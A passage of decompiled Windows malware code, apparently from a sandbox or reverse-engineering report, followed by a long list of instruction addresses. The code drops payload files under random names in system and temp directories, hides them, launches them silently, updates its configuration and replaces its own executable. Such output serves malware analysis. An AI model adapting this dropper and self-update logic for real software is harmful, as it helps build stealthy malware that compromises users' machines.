																	GetSystemDirectoryA( &_v408, 0x100);
																	_t777 =  &_v408;
																	_t602 = _t777 + 1;
																	do {
																		_t711 =  *_t777;
																		_t777 = _t777 + 1;
																		__eflags = _t711;
																	} while (_t711 != 0);
																	_t765 = _t777 - _t602;
																	__eflags = _t765;
																	goto L83;
																} else {
																	GetEnvironmentVariableA(E02512544(0x25222f8, 0x2520a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
																	E0251EE2A(_t711, 0x25222f8, 0, 0x100);
																	_t607 =  &_v408;
																	_t811 = _t811 + 0x20;
																	_t779 = _t607 + 1;
																	goto L77;
																	L83:
																	__eflags = _t765;
																	if(_t765 == 0) {
																		goto L96;
																	}
																	__eflags =  *((char*)(_t806 + _t765 - 0x195)) - 0x5c;
																	goto L85;
																	L77:
																	_t711 =  *_t607;
																	_t607 = _t607 + 1;
																	__eflags = _t711;
																	if(_t711 != 0) {
																		goto L77;
																	} else {
																		_t765 = _t607 - _t779;
																		goto L83;
																	}
																}
															} else {
																_t109 =  &(_t797[4]); // 0x4200008
																_t780 = _t109;
																_t609 = _t109;
																_t110 =  &(_t609[1]); // 0x4200009
																_t726 = _t110;
																goto L69;
																do {
																	L71:
																	_t711 =  *_t613;
																	_t613 = _t613 + 1;
																	__eflags = _t711;
																} while (_t711 != 0);
																_t765 = _t613 - _t781;
																__eflags = _t765;
																if(_t765 == 0) {
																	L96:
																	__eflags =  *_t797 & 0x00000004;
																	if(( *_t797 & 0x00000004) == 0) {
																		_t165 =  &(_t797[0x104]); // 0x4200108
																		_t502 = _t165;
																		L106:
																		_push(_t502);
																		L107:
																		lstrcatA( &_v408, ??);
																		L108:
																		__eflags =  *_t797 & 0x00000040;
																		if(( *_t797 & 0x00000040) != 0) {
																			E02518E26(_t711, _t748, 0x22c808, 0, 0, 0, 0,  &_v56);
																			_t811 = _t811 + 0x18;
																		}
																		__eflags = _v39 - 0xc;
																		if(_v39 == 0xc) {
																			_t583 = E0251EE95( &_v408, ".dat");
																			_pop(_t711);
																			__eflags = _t583;
																			if(_t583 != 0) {
																				SetFileAttributesA( &_v408, 0x80);
																			}
																		}
																		_t766 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
																		__eflags = _t766 - 0xffffffff;
																		if(_t766 == 0xffffffff) {
																			E0251EE2A(_t711,  &_v408, 0, 0x120);
																			GetEnvironmentVariableA(E02512544(0x25222f8, 0x2520a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
																			E0251EE2A(_t711, 0x25222f8, 0, 0x100);
																			_t513 =  &_v408;
																			_t811 = _t811 + 0x2c;
																			_t768 = _t513 + 1;
																			do {
																				_t712 =  *_t513;
																				_t513 = _t513 + 1;
																				__eflags = _t712;
																			} while (_t712 != 0);
																			_t514 = _t513 - _t768;
																			__eflags = _t514;
																			if(_t514 != 0) {
																				__eflags =  *((char*)(_t806 + _t514 - 0x195)) - 0x5c;
																				if( *((char*)(_t806 + _t514 - 0x195)) != 0x5c) {
																					 *((char*)(_t806 + _t514 - 0x194)) = 0x5c;
																				}
																			}
																			_t210 =  &(_t797[0x104]); // 0x4200108
																			lstrcatA( &_v408, _t210);
																			__eflags = _v39 - 0xc;
																			if(_v39 == 0xc) {
																				_t545 = E0251EE95( &_v408, ".dat");
																				_pop(_t712);
																				__eflags = _t545;
																				if(_t545 != 0) {
																					SetFileAttributesA( &_v408, 0x80);
																				}
																			}
																			_t769 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
																			__eflags = _t769 - 0xffffffff;
																			if(_t769 != 0xffffffff) {
																				_t218 =  &(_t797[0x128]); // 0x420012c
																				WriteFile(_t769, _t218, _t797[0x124],  &_v56, 0);
																				CloseHandle(_t769);
																				__eflags = _v39 - 0xc;
																				if(_v39 == 0xc) {
																					_t541 = E0251EE95( &_v408, ".dat");
																					_pop(_t712);
																					__eflags = _t541;
																					if(_t541 != 0) {
																						SetFileAttributesA( &_v408, 2);
																					}
																				}
																				_v12 = 1;
																			}
																			goto L143;
																		} else {
																			_t176 =  &(_t797[0x128]); // 0x420012c
																			WriteFile(_t766, _t176, _t797[0x124],  &_v56, 0);
																			CloseHandle(_t766);
																			__eflags = _v39 - 0xc;
																			if(_v39 == 0xc) {
																				_t579 = E0251EE95( &_v408, ".dat");
																				__eflags = _t579;
																				if(_t579 != 0) {
																					SetFileAttributesA( &_v408, 2);
																				}
																			}
																			_v12 = 1;
																			_t552 = E0251EE95( &_v408, ".dat");
																			_pop(_t712);
																			__eflags = _t552;
																			if(_t552 == 0) {
																				L143:
																				__eflags =  *_t797 & 0x00000040;
																				if(( *_t797 & 0x00000040) != 0) {
																					E02518E26(_t712, _t748, 0x22c80c, 0, 0, 0, 0,  &_v56);
																					_t811 = _t811 + 0x18;
																				}
																				__eflags =  *_t797 & 0x00000002;
																				if(( *_t797 & 0x00000002) != 0) {
																					__eflags = _v12;
																					if(__eflags != 0) {
																						E02517EAD(_t748, __eflags, 1);
																						E02517FCF(_t712);
																						_t770 = 0x44;
																						E0251EE2A(_t712,  &_v876, 0, _t770);
																						_t811 = _t811 + 0x10;
																						_v876.cb = _t770;
																						_t527 = CreateProcessA( &_v408, 0x2520264, 0, 0, 0, 0x8000000, 0, 0,  &_v876,  &_v424);
																						__eflags = _t527;
																						if(_t527 == 0) {
																							E02517EE6(_t712);
																							E02517EAD(_t748, __eflags, 0);
																							DeleteFileA( &_v408);
																						} else {
																							CloseHandle(_v424.hThread);
																							CloseHandle(_v424);
																						}
																					}
																				}
																				goto L150;
																			} else {
																				E0251EE2A(_t712,  &_v408, 0, 0x120);
																				GetEnvironmentVariableA(E02512544(0x25222f8, 0x2520a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
																				E0251EE2A(_t712, 0x25222f8, 0, 0x100);
																				_t559 =  &_v408;
																				_t811 = _t811 + 0x2c;
																				_t773 = _t559 + 1;
																				do {
																					_t712 =  *_t559;
																					_t559 = _t559 + 1;
																					__eflags = _t712;
																				} while (_t712 != 0);
																				_t560 = _t559 - _t773;
																				__eflags = _t560;
																				if(_t560 != 0) {
																					__eflags =  *((char*)(_t806 + _t560 - 0x195)) - 0x5c;
																					if( *((char*)(_t806 + _t560 - 0x195)) != 0x5c) {
																						 *((char*)(_t806 + _t560 - 0x194)) = 0x5c;
																					}
																				}
																				_t190 =  &(_t797[0x104]); // 0x4200108
																				lstrcatA( &_v408, _t190);
																				__eflags = _v39 - 0xc;
																				if(_v39 == 0xc) {
																					_t575 = E0251EE95( &_v408, ".dat");
																					_pop(_t712);
																					__eflags = _t575;
																					if(_t575 != 0) {
																						SetFileAttributesA( &_v408, 0x80);
																					}
																				}
																				_t774 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
																				__eflags = _t774 - 0xffffffff;
																				if(_t774 != 0xffffffff) {
																					_t198 =  &(_t797[0x128]); // 0x420012c
																					WriteFile(_t774, _t198, _t797[0x124],  &_v56, 0);
																					CloseHandle(_t774);
																					__eflags = _v39 - 0xc;
																					if(_v39 == 0xc) {
																						_t571 = E0251EE95( &_v408, ".dat");
																						_pop(_t712);
																						__eflags = _t571;
																						if(_t571 != 0) {
																							SetFileAttributesA( &_v408, 2);
																						}
																					}
																				}
																				goto L143;
																			}
																		}
																	}
																	_t588 = E0251ECA5();
																	_t711 = 5;
																	_t748 = _t588 % _t711 + 3;
																	__eflags = _t748;
																	_v17 = _t748;
																	if(_t748 == 0) {
																		L99:
																		 *(_t806 + _t765 - 0x194) = 0;
																		_t590 =  *_t797;
																		__eflags = _t590 & 0x0000000a;
																		if((_t590 & 0x0000000a) != 0) {
																			_t502 = E02512544(0x25222f8, 0x2520694, 5, 0xe4, 0xc8);
																			_t811 = _t811 + 0x14;
																			goto L106;
																		}
																		__eflags = _t590 & 0x00000010;
																		if((_t590 & 0x00000010) == 0) {
																			__eflags = _t590 & 0x00000020;
																			if((_t590 & 0x00000020) == 0) {
																				goto L108;
																			}
																			_push(".dat");
																			goto L107;
																		}
																		_push(".sys");
																		goto L107;
																	} else {
																		goto L98;
																	}
																	do {
																		L98:
																		_t591 = E0251ECA5();
																		_t711 = 0x19;
																		_t748 = _t591 % _t711 + 0x61;
																		 *(_t806 + _t765 - 0x194) = _t748;
																		_t765 = _t765 + 1;
																		_t155 =  &_v17;
																		 *_t155 = _v17 - 1;
																		__eflags =  *_t155;
																	} while ( *_t155 != 0);
																	goto L99;
																}
																_t615 =  *((intOrPtr*)(_t806 + _t765 - 0x195));
																__eflags = _t615 - 0x5c;
																if(_t615 != 0x5c) {
																	__eflags = _t615 - 0x2f;
																	L85:
																	if(__eflags != 0) {
																		 *(_t806 + _t765 - 0x194) = 0x5c;
																		_t765 = _t765 + 1;
																	}
																}
																goto L96;
																L69:
																_t748 =  *_t609;
																_t609 =  &(_t609[1]);
																__eflags = _t748;
																if(_t748 != 0) {
																	goto L69;
																} else {
																	__eflags = _t609 - _t726;
																	E0251EE08( &_v408, _t780, _t609 - _t726);
																	_t613 =  &_v408;
																	_t811 = _t811 + 0xc;
																	_t781 = _t613 + 1;
																	goto L71;
																}
															}
														}
													}
													__eflags =  *0x252211c & 0x00000004;
													if(( *0x252211c & 0x00000004) == 0) {
														continue;
													}
													__eflags = _v60;
													if(_v60 == 0) {
														continue;
													}
													__eflags =  *0x252201d; // 0x0
													if(__eflags == 0) {
														continue;
													}
													__imp__#3(_v16);
													Sleep(0x3e8);
													E0251E318();
													ExitProcess(0);
												} else {
													_t798 =  &(_t796[8]);
													__eflags = _t798;
													do {
														_t621 =  *(_t798 - 4);
														__eflags = _t621;
														if(_t621 == 0) {
															_v60 = 1;
															 *0x2522138 =  *_t798;
														} else {
															_t624 = _t621 - 1;
															__eflags = _t624;
															if(_t624 == 0) {
																E0251EA84(1, "localcfg", "lid_file_upd",  *_t798);
																_t811 = _t811 + 0x10;
																 *0x252213c =  *_t798;
															} else {
																__eflags = _t624 == 1;
																if(_t624 == 1) {
																	E0251EA84(1, "localcfg", "flags_upd",  *_t798);
																	_t811 = _t811 + 0x10;
																	 *0x252211c =  *0x252211c |  *_t798;
																}
															}
														}
														_t764 = _t764 + 1;
														_t798 =  &(_t798[2]);
														__eflags = _t764 -  *_v8;
													} while (_t764 <  *_v8);
													goto L57;
												}
											}
											__eflags = _t395 - 0x1b;
											if(_t395 != 0x1b) {
												goto L156;
											}
											__eflags = _v52 - 0xc;
											if(_v52 <= 0xc) {
												_t630 =  *0x25236b0; // 0x4200000
												 *0x25221a4 = _t630[4];
												 *0x25222d4 = _t630[8];
												_t632 = E0251F04E(0);
												asm("adc edx, ebx");
												 *0x25236a8 = _t632 + 0xe10;
												 *0x25236ac = _t748;
												continue;
											}
											_t634 = E02517E2F(_t748);
											__eflags = _t634;
											if(_t634 != 0) {
												continue;
											}
											_t635 =  *0x25236b0; // 0x4200000
											_v12 = _t635;
											__eflags = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe"; // 0x43
											if(__eflags == 0) {
												L45:
												_t636 = _v12;
												 *0x25221a4 =  *(_t636 + 4);
												 *0x25222d4 =  *(_t636 + 8);
												E02517EAD(_t748, __eflags, 0);
												goto L46;
											} else {
												GetTempPathA(0x120,  &_v408);
												_t642 = E02518274( &_v408);
												_pop(_t709);
												_t782 = _t642;
												_t801 = (E0251ECA5() & 0x00000003) + 5;
												goto L38;
												L38:
												__eflags = _t801;
												if(_t801 > 0) {
													_t644 = E0251ECA5();
													_t709 = 0x1a;
													_t748 = _t644 % _t709 + 0x61;
													 *(_t806 + _t782 - 0x194) = _t748;
													_t782 = _t782 + 1;
													_t801 = _t801 - 1;
													__eflags = _t801;
													goto L38;
												} else {
													E0251EF00(_t806 + _t782 - 0x194, E02512544(0x25222f8, 0x2520694, 5, 0xe4, 0xc8));
													E0251EE2A(_t709, 0x25222f8, 0, 0x100);
													_t811 = _t811 + 0x28;
													_t651 = CreateFileA( &_v408, 0x40000000, 0, 0, 2, 0, 0);
													_v8 = _t651;
													__eflags = _t651 - 0xffffffff;
													if(__eflags != 0) {
														_t657 = WriteFile(_v8,  &(_v12[0xc]), _v52 + 0xfffffff4,  &_v100, 0);
														_push(_v8);
														__eflags = _t657;
														if(__eflags == 0) {
															CloseHandle();
														} else {
															CloseHandle();
															_push("C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe");
															_push( &_v408);
															wsprintfA( &_v1176, E02512544(0x25222f8, 0x2520fe4, 0xc, 0xe4, 0xc8));
															E0251EE2A(_t709, 0x25222f8, 0, 0x100);
															_t803 = 0x44;
															E0251EE2A(_t709,  &_v808, 0, 0x25222f8);
															_v808.cb = _t803;
															E0251EE2A(_t709,  &_v120, 0, 0x10);
															_t811 = _t811 + 0x48;
															E02517FCF(_t709);
															_t673 = CreateProcessA(0,  &_v1176, 0, 0, 0, 0x8000000, 0, 0,  &_v808,  &_v120);
															__eflags = _t673;
															if(_t673 != 0) {
																WaitForSingleObject(_v120.hProcess, 0xea60);
																CloseHandle(_v120.hThread);
																CloseHandle(_v120);
																_t681 = E0251F04E(0) + 0xe10;
																__eflags = _t681;
																asm("adc edx, ebx");
																_pop(_t709);
																 *0x25236a8 = _t681;
																 *0x25236ac = _t748;
															}
															E02517EE6(_t709);
															DeleteFileA( &_v408);
														}
													}
													goto L45;
												}
											}
										}
										L228:
										__imp__#3(_v16);
										E0251E318();
										return _v68;
									} else {
										__imp__#3(_v16);
										goto L21;
									}
								}
								L15:
								__imp__#3(_v16); // executed
							}
							return E0251C8AA(_t829);
						} else {
							_t805 =  *0x2523670; // 0x2
							while(_v12 < _t805) {
								_t7 = _t747 + 1; // 0x1
								asm("cdq");
								_t747 = _t7 % _t805;
								 *0x252367c =  *0x252367c + 1;
								_v12 = _v12 + 1;
								 *0x2523674 = _t747;
								if( *((intOrPtr*)(_t747 * 0x45 + _t688 + 0x41)) == 0) {
									continue;
								}
								goto L11;
							}
							goto L11;
						}
					}
					_t686 = E0251EBCC(0x100000);
					 *0x25236b0 = _t686;
					if(_t686 == 0) {
						goto L21;
					}
					goto L7;
				}
				_t820 =  *0x2523670; // 0x2
				if(_t820 != 0) {
					goto L3;
				}
				goto L2;
			}



















































































































































































                                                                                                                                  0x0251c921
                                                                                                                                  0x0251c924
                                                                                                                                  0x0251c927
                                                                                                                                  0x0251c92d
                                                                                                                                  0x0251c937
                                                                                                                                  0x0251c937
                                                                                                                                  0x0251c93c
                                                                                                                                  0x0251c93c
                                                                                                                                  0x0251c942
                                                                                                                                  0x0251cb69
                                                                                                                                  0x0251cb69
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cb69
                                                                                                                                  0x0251c948
                                                                                                                                  0x0251c94e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251c973
                                                                                                                                  0x0251c986
                                                                                                                                  0x0251c98b
                                                                                                                                  0x0251c990
                                                                                                                                  0x0251c993
                                                                                                                                  0x0251c998
                                                                                                                                  0x0251c99e
                                                                                                                                  0x0251c9b8
                                                                                                                                  0x0251c9b8
                                                                                                                                  0x0251c9be
                                                                                                                                  0x0251c9c9
                                                                                                                                  0x0251c9d0
                                                                                                                                  0x0251c9fd
                                                                                                                                  0x0251c9fd
                                                                                                                                  0x0251ca00
                                                                                                                                  0x0251ca03
                                                                                                                                  0x0251ca08
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251ca18
                                                                                                                                  0x0251ca1f
                                                                                                                                  0x0251ca22
                                                                                                                                  0x0251ca24
                                                                                                                                  0x0251ca3f
                                                                                                                                  0x0251ca44
                                                                                                                                  0x0251ca47
                                                                                                                                  0x0251ca49
                                                                                                                                  0x0251ca5e
                                                                                                                                  0x0251ca63
                                                                                                                                  0x0251ca6e
                                                                                                                                  0x0251ca6f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251ca71
                                                                                                                                  0x0251ca78
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251ca7a
                                                                                                                                  0x0251ca81
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251ca95
                                                                                                                                  0x0251ca9b
                                                                                                                                  0x0251caa1
                                                                                                                                  0x0251caa7
                                                                                                                                  0x0251cab8
                                                                                                                                  0x0251cac2
                                                                                                                                  0x0251cac5
                                                                                                                                  0x0251cad4
                                                                                                                                  0x0251cae7
                                                                                                                                  0x0251caf7
                                                                                                                                  0x0251cb09
                                                                                                                                  0x0251cb27
                                                                                                                                  0x0251cb2d
                                                                                                                                  0x0251cb37
                                                                                                                                  0x0251cb3d
                                                                                                                                  0x0251cb47
                                                                                                                                  0x0251cb4d
                                                                                                                                  0x0251cb54
                                                                                                                                  0x0251cb59
                                                                                                                                  0x0251cb5c
                                                                                                                                  0x0251cb5e
                                                                                                                                  0x0251cb70
                                                                                                                                  0x0251cb76
                                                                                                                                  0x0251cb7c
                                                                                                                                  0x0251cb7c
                                                                                                                                  0x0251cb7c
                                                                                                                                  0x0251cb9e
                                                                                                                                  0x0251cba3
                                                                                                                                  0x0251cba6
                                                                                                                                  0x0251cba9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cbaf
                                                                                                                                  0x0251cbb1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cbb3
                                                                                                                                  0x0251cbb6
                                                                                                                                  0x0251cbb8
                                                                                                                                  0x0251daea
                                                                                                                                  0x0251daea
                                                                                                                                  0x0251daeb
                                                                                                                                  0x0251daf0
                                                                                                                                  0x0251daf2
                                                                                                                                  0x0251daf5
                                                                                                                                  0x0251daf7
                                                                                                                                  0x0251dafd
                                                                                                                                  0x0251daff
                                                                                                                                  0x0251db02
                                                                                                                                  0x0251db0b
                                                                                                                                  0x0251db1b
                                                                                                                                  0x0251db20
                                                                                                                                  0x0251db20
                                                                                                                                  0x0251db02
                                                                                                                                  0x0251dafd
                                                                                                                                  0x0251db23
                                                                                                                                  0x0251db24
                                                                                                                                  0x0251db24
                                                                                                                                  0x00000000
                                                                                                                                  0x0251db29
                                                                                                                                  0x0251cbbe
                                                                                                                                  0x0251cbc1
                                                                                                                                  0x0251d662
                                                                                                                                  0x0251d667
                                                                                                                                  0x0251d669
                                                                                                                                  0x0251d66c
                                                                                                                                  0x0251d66f
                                                                                                                                  0x0251d672
                                                                                                                                  0x0251d675
                                                                                                                                  0x0251d6c7
                                                                                                                                  0x0251d6c7
                                                                                                                                  0x0251d6cb
                                                                                                                                  0x0251d707
                                                                                                                                  0x0251d707
                                                                                                                                  0x0251d70b
                                                                                                                                  0x0251d754
                                                                                                                                  0x0251d754
                                                                                                                                  0x0251d758
                                                                                                                                  0x0251d79e
                                                                                                                                  0x0251d79e
                                                                                                                                  0x0251d7a2
                                                                                                                                  0x0251d8b3
                                                                                                                                  0x0251d8b3
                                                                                                                                  0x0251d8ba
                                                                                                                                  0x0251d93a
                                                                                                                                  0x0251d93a
                                                                                                                                  0x0251d941
                                                                                                                                  0x0251da0e
                                                                                                                                  0x0251da0e
                                                                                                                                  0x0251da11
                                                                                                                                  0x0251da11
                                                                                                                                  0x0251da14
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251da1d
                                                                                                                                  0x0251da23
                                                                                                                                  0x0251da25
                                                                                                                                  0x0251da90
                                                                                                                                  0x0251da90
                                                                                                                                  0x0251da94
                                                                                                                                  0x0251da9b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251daa1
                                                                                                                                  0x0251daa4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251dabf
                                                                                                                                  0x0251dac2
                                                                                                                                  0x0251dac7
                                                                                                                                  0x0251daca
                                                                                                                                  0x0251dacc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251dacc
                                                                                                                                  0x0251da27
                                                                                                                                  0x0251da2a
                                                                                                                                  0x0251da2c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251da42
                                                                                                                                  0x0251da7d
                                                                                                                                  0x0251da7d
                                                                                                                                  0x0251da80
                                                                                                                                  0x0251da83
                                                                                                                                  0x0251da85
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251da5f
                                                                                                                                  0x0251da64
                                                                                                                                  0x0251da67
                                                                                                                                  0x0251da69
                                                                                                                                  0x0251da89
                                                                                                                                  0x00000000
                                                                                                                                  0x0251da89
                                                                                                                                  0x0251da7a
                                                                                                                                  0x0251da7a
                                                                                                                                  0x00000000
                                                                                                                                  0x0251da87
                                                                                                                                  0x00000000
                                                                                                                                  0x0251da11
                                                                                                                                  0x0251d947
                                                                                                                                  0x0251d94c
                                                                                                                                  0x0251d94e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d955
                                                                                                                                  0x0251d95b
                                                                                                                                  0x0251d961
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d967
                                                                                                                                  0x0251d975
                                                                                                                                  0x0251d975
                                                                                                                                  0x0251d97b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d981
                                                                                                                                  0x0251d987
                                                                                                                                  0x0251d9c9
                                                                                                                                  0x0251d9c9
                                                                                                                                  0x0251d9ce
                                                                                                                                  0x0251d9d0
                                                                                                                                  0x0251d9d6
                                                                                                                                  0x0251d9d9
                                                                                                                                  0x0251d9df
                                                                                                                                  0x0251d9f7
                                                                                                                                  0x0251d9fe
                                                                                                                                  0x0251da03
                                                                                                                                  0x0251da06
                                                                                                                                  0x0251da08
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251da08
                                                                                                                                  0x0251d998
                                                                                                                                  0x0251d99a
                                                                                                                                  0x0251d99d
                                                                                                                                  0x0251d99f
                                                                                                                                  0x0251d9ab
                                                                                                                                  0x0251d9b4
                                                                                                                                  0x0251d9b9
                                                                                                                                  0x0251d9be
                                                                                                                                  0x0251d9be
                                                                                                                                  0x0251d9c1
                                                                                                                                  0x0251d9c7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d9c7
                                                                                                                                  0x0251d969
                                                                                                                                  0x0251d96f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d96f
                                                                                                                                  0x0251d8da
                                                                                                                                  0x0251d8df
                                                                                                                                  0x0251d8e4
                                                                                                                                  0x0251d8e7
                                                                                                                                  0x0251d8e7
                                                                                                                                  0x0251d8ea
                                                                                                                                  0x0251d8ea
                                                                                                                                  0x0251d8ec
                                                                                                                                  0x0251d8ed
                                                                                                                                  0x0251d8ed
                                                                                                                                  0x0251d8f1
                                                                                                                                  0x0251d8f3
                                                                                                                                  0x0251d8f6
                                                                                                                                  0x0251d8f8
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d903
                                                                                                                                  0x0251d918
                                                                                                                                  0x0251d92a
                                                                                                                                  0x0251d92f
                                                                                                                                  0x0251d932
                                                                                                                                  0x0251d934
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d934
                                                                                                                                  0x0251d7a8
                                                                                                                                  0x0251d7aa
                                                                                                                                  0x0251d7b0
                                                                                                                                  0x0251d7be
                                                                                                                                  0x0251d7c3
                                                                                                                                  0x0251d7cf
                                                                                                                                  0x0251d7d6
                                                                                                                                  0x0251d7e1
                                                                                                                                  0x0251d7e2
                                                                                                                                  0x0251d7e2
                                                                                                                                  0x0251d7e5
                                                                                                                                  0x0251d7ed
                                                                                                                                  0x0251d7ee
                                                                                                                                  0x0251d7f4
                                                                                                                                  0x0251d81f
                                                                                                                                  0x0251d825
                                                                                                                                  0x0251d828
                                                                                                                                  0x0251d828
                                                                                                                                  0x0251d82a
                                                                                                                                  0x0251d830
                                                                                                                                  0x0251d832
                                                                                                                                  0x0251d85b
                                                                                                                                  0x0251d85b
                                                                                                                                  0x0251d85d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d878
                                                                                                                                  0x0251d87f
                                                                                                                                  0x0251d884
                                                                                                                                  0x0251d887
                                                                                                                                  0x0251d889
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d88f
                                                                                                                                  0x0251d895
                                                                                                                                  0x0251d897
                                                                                                                                  0x0251d897
                                                                                                                                  0x0251d89d
                                                                                                                                  0x0251d8a2
                                                                                                                                  0x0251d8a4
                                                                                                                                  0x0251d8a7
                                                                                                                                  0x0251d8ad
                                                                                                                                  0x0251d8ad
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d834
                                                                                                                                  0x0251d834
                                                                                                                                  0x0251d836
                                                                                                                                  0x0251d836
                                                                                                                                  0x0251d839
                                                                                                                                  0x0251d839
                                                                                                                                  0x0251d83b
                                                                                                                                  0x0251d83c
                                                                                                                                  0x0251d83c
                                                                                                                                  0x0251d842
                                                                                                                                  0x0251d847
                                                                                                                                  0x0251d850
                                                                                                                                  0x0251d855
                                                                                                                                  0x0251d858
                                                                                                                                  0x0251d858
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d858
                                                                                                                                  0x0251d832
                                                                                                                                  0x0251d783
                                                                                                                                  0x0251d792
                                                                                                                                  0x0251d797
                                                                                                                                  0x0251d79a
                                                                                                                                  0x0251d79c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d773
                                                                                                                                  0x0251d778
                                                                                                                                  0x0251d77b
                                                                                                                                  0x0251d77d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d77d
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d783
                                                                                                                                  0x0251d70d
                                                                                                                                  0x0251d712
                                                                                                                                  0x0251d718
                                                                                                                                  0x0251d71f
                                                                                                                                  0x0251d721
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d73d
                                                                                                                                  0x0251d744
                                                                                                                                  0x0251d749
                                                                                                                                  0x0251d74c
                                                                                                                                  0x0251d74e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d74e
                                                                                                                                  0x0251d6d3
                                                                                                                                  0x0251d6f0
                                                                                                                                  0x0251d6f7
                                                                                                                                  0x0251d6fc
                                                                                                                                  0x0251d6ff
                                                                                                                                  0x0251d701
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d701
                                                                                                                                  0x0251d67a
                                                                                                                                  0x0251d67b
                                                                                                                                  0x0251d67c
                                                                                                                                  0x0251d6bb
                                                                                                                                  0x0251d6bb
                                                                                                                                  0x0251d6c0
                                                                                                                                  0x0251d6c3
                                                                                                                                  0x0251d6c5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d67f
                                                                                                                                  0x0251d696
                                                                                                                                  0x0251d69d
                                                                                                                                  0x0251d6a2
                                                                                                                                  0x0251d6a5
                                                                                                                                  0x0251d6a7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d6b0
                                                                                                                                  0x0251d6b0
                                                                                                                                  0x0251d6b3
                                                                                                                                  0x0251d6b4
                                                                                                                                  0x0251d6b5
                                                                                                                                  0x0251d6b5
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d6bb
                                                                                                                                  0x0251cbc7
                                                                                                                                  0x0251cbca
                                                                                                                                  0x0251d5f2
                                                                                                                                  0x0251d5f8
                                                                                                                                  0x0251d5fa
                                                                                                                                  0x0251d600
                                                                                                                                  0x0251d611
                                                                                                                                  0x0251d616
                                                                                                                                  0x0251d61e
                                                                                                                                  0x0251d621
                                                                                                                                  0x0251d623
                                                                                                                                  0x0251d62e
                                                                                                                                  0x0251d635
                                                                                                                                  0x0251d637
                                                                                                                                  0x0251d63d
                                                                                                                                  0x0251d643
                                                                                                                                  0x0251d649
                                                                                                                                  0x0251d64f
                                                                                                                                  0x0251d655
                                                                                                                                  0x0251d65a
                                                                                                                                  0x0251d65a
                                                                                                                                  0x0251d637
                                                                                                                                  0x0251d623
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d5fa
                                                                                                                                  0x0251cbd0
                                                                                                                                  0x0251cbd3
                                                                                                                                  0x0251d5e1
                                                                                                                                  0x0251cdec
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cdec
                                                                                                                                  0x0251cbd9
                                                                                                                                  0x0251d589
                                                                                                                                  0x0251d589
                                                                                                                                  0x0251d589
                                                                                                                                  0x0251d58b
                                                                                                                                  0x0251d58b
                                                                                                                                  0x0251d58b
                                                                                                                                  0x0251d591
                                                                                                                                  0x0251d593
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d595
                                                                                                                                  0x0251d598
                                                                                                                                  0x0251d59a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d59c
                                                                                                                                  0x0251d59e
                                                                                                                                  0x0251d59e
                                                                                                                                  0x0251d5a1
                                                                                                                                  0x0251d5a1
                                                                                                                                  0x0251d5a3
                                                                                                                                  0x0251d5a5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d5a7
                                                                                                                                  0x0251d5aa
                                                                                                                                  0x0251d5c3
                                                                                                                                  0x0251d5c5
